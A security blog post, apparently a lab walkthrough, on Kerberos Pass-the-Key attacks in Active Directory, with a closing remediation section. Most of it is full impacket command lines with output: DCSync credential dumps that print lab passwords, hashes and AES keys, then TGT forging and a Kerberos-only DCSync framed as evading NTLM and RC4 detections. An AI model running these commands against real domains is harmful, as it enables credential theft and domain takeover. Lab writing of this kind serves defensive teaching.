Overpass-the-Hash / Pass-the-Key

Published by Matt Clemons on

Overpass-the-Hash is commonly described as converting an NTLM hash into a Kerberos TGT. The more precise variant, Pass-the-Key, skips the NT hash entirely and authenticates directly with a Kerberos AES key. The result is a fully native Kerberos flow with no NTLM traffic, no RC4 downgrade, and no NTLM-based detection signatures.

AES keys live in NTDS.DIT alongside NT hashes. A DCSync pull with sufficient replication rights returns both. eddard.stark is a domain admin in north; daenerys.targaryen holds the same role in essos. Both credentials were recovered in earlier posts. The goal here is to use their AES keys, not their passwords or NT hashes, to obtain valid TGTs.

DCSync for eddard.stark:

impacket-secretsdump 'north.sevenkingdoms.local/eddard.stark:FightP3aceAndHonor!@winterfell.north.sevenkingdoms.local' \
    -just-dc-user eddard.stark
eddard.stark:1111:aad3b435b51404eeaad3b435b51404ee:d977b98c6c9282c5c478be1d97b237b8:::
[*] Kerberos keys grabbed
eddard.stark:aes256-cts-hmac-sha1-96:f6b4d01107eb34c0ecb5f07d804fa9959dce6643f8e4688df17623b847ec7fc4

And daenerys.targaryen from meereen:

impacket-secretsdump 'essos.local/daenerys.targaryen:BurnThemAll!@meereen.essos.local' \
    -just-dc-user daenerys.targaryen
daenerys.targaryen:1113:aad3b435b51404eeaad3b435b51404ee:34534854d33b398b66684072224bb47a:::
[*] Kerberos keys grabbed
daenerys.targaryen:aes256-cts-hmac-sha1-96:cf091fbd07f729567ac448ba96c08b12fa67c1372f439ae093f67c6e2cf82378

Worth noting: AES keys are derived from the account password. Resetting a password regenerates them. If a key extracted from a prior session stops working, a fresh DCSync will produce the current key.

With the keys in hand, getTGT.py sends an AS-REQ with pre-authentication encrypted under the AES256 key. The KDC validates it and issues a TGT. No NT hash is used, no NTLM exchange occurs.

impacket-getTGT north.sevenkingdoms.local/eddard.stark \
    -aesKey f6b4d01107eb34c0ecb5f07d804fa9959dce6643f8e4688df17623b847ec7fc4

impacket-getTGT essos.local/daenerys.targaryen \
    -aesKey cf091fbd07f729567ac448ba96c08b12fa67c1372f439ae093f67c6e2cf82378
[*] Saving ticket in eddard.stark.ccache
[*] Saving ticket in daenerys.targaryen.ccache

describeTicket confirms etype 18 throughout:

impacket-describeTicket eddard.stark.ccache
[*] User Name        : eddard.stark
[*] User Realm       : NORTH.SEVENKINGDOMS.LOCAL
[*] Encryption type  : aes256_cts_hmac_sha1_96 (etype 18)

With KRB5CCNAME set, the ticket is used directly for any Kerberos capable tool. DCSync against winterfell with no password or hash on the command line:

KRB5CCNAME=eddard.stark.ccache impacket-secretsdump \
    -k -no-pass north.sevenkingdoms.local/eddard.stark@winterfell.north.sevenkingdoms.local \
    -just-dc-user north/administrator
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c5f2d015f316018f6405522825689ffe:::

Same against meereen:

KRB5CCNAME=daenerys.targaryen.ccache impacket-secretsdump \
    -k -no-pass essos.local/daenerys.targaryen@meereen.essos.local \
    -just-dc-user essos/administrator
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c5f2d015f316018f6405522825689ffe:::

Both DCSync operations complete over pure Kerberos. No NTLMSSP frames, no NetNTLM challenges, no etype 23 downgrade. The authentication is indistinguishable from an interactive logon from the KDC’s perspective. Detections built on NTLM event IDs, RC4 etype alerts, or NetNTLM relay indicators will not fire.

Remediation

The root capability is DCSync. Without replication rights, AES keys are unreachable through this path. Audit accounts holding Replicating Directory Changes All on the domain object and remove that right from any non DC principal. Enroll high value accounts in Protected Users; members cannot authenticate with RC4 and their credentials are not cached on member servers. Credential Guard prevents Kerberos key extraction from LSASS on member machines but does not protect NTDS.DIT on domain controllers. Monitor event 4662 for access to the domain object with replication GUIDs (1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 and 1131f6ad), and baseline 4769 TGS requests for privileged accounts to detect service ticket requests from unexpected source hosts.

Categories: SecurityWindows

0 Comments

Leave a Reply

Avatar placeholder

Your email address will not be published. Required fields are marked *

Related Posts

Security

GMSA Password Retrieval — Abusing msDS-ManagedPassword

Group Managed Service Accounts (gMSAs) were introduced to solve a real problem: service accounts with static passwords. Traditional service accounts require someone to set a password, store it somewhere, and rotate it manually. In practice, Read more

Security

LAPS Password Retrieval via ACL Access

Local Administrator Password Solution (LAPS) solves a real problem. Before it existed, most Windows environments reused the same local administrator password across every machine in the domain. Compromise one host, and you had credentials that Read more

Security

DCSync Without Domain Admin: Explicit Replication Rights

DCSync does not require Domain Admin membership. The underlying mechanism, the Directory Replication Service Remote Protocol (DRSR), only checks two ACEs on the domain naming context head: DS-Replication-Get-Changes and DS-Replication-Get-Changes-All. Any principal with both ACEs Read more